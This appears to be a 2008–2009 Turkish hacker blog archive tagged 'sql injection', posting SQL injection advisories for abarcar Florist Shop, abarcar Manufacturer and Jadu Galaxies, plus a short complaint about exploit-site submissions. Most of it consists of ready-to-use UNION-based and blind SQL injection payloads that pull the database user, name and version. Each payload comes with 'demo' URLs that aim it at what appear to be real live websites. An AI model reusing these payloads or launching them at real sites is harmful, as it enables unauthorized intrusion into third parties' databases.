sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
3 Mart 2009 Salı
str0ke ömrümü yedin xD
yav son günlerde gönderdiğim bütün buglara bir kulp takıyor namussuz :D yok nerden indircem yok versiyon a.q sen bul onlarında açık varmı var :D sözün kısası pek bi anlaşamıyoruz xD
31 Aralık 2008 Çarşamba
abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt
link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
exploit for demo: ( you must look title )
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt
link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
exploit for demo: ( you must look title )
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarmanu-sql.txt
link: http://www.experl.com/abarcar-manufacturer-system-script-plistingsphp-listingid-blind-remote-sql-inj-353/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]
[SQL]=
-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
Exploit: ( blind )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
18 Kasım 2008 Salı
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
Kaydol:
Kayıtlar (Atom)
